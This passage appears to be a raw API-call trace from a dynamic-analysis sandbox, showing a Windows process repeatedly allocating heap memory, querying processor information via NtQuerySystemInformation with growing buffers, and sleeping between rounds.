[0206.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.443] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.443] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.443] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.444] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.444] Sleep (dwMilliseconds=0x110) [0206.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.458] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.459] Sleep (dwMilliseconds=0x110) [0206.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.474] Sleep (dwMilliseconds=0x110) [0206.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.488] Sleep (dwMilliseconds=0x110) [0206.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.504] Sleep (dwMilliseconds=0x110) [0206.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.521] Sleep (dwMilliseconds=0x110) [0206.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.532] Sleep (dwMilliseconds=0x110) [0206.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.548] Sleep (dwMilliseconds=0x110) [0206.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.567] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.568] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.569] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.569] Sleep (dwMilliseconds=0x110) [0206.575] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.575] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.582] Sleep (dwMilliseconds=0x110) [0206.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.600] Sleep (dwMilliseconds=0x110) [0206.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.614] Sleep (dwMilliseconds=0x110) [0206.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.631] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.632] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.632] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.632] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.633] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.633] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.637] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.637] Sleep (dwMilliseconds=0x110) [0206.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.661] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.662] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.662] Sleep (dwMilliseconds=0x110) [0206.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 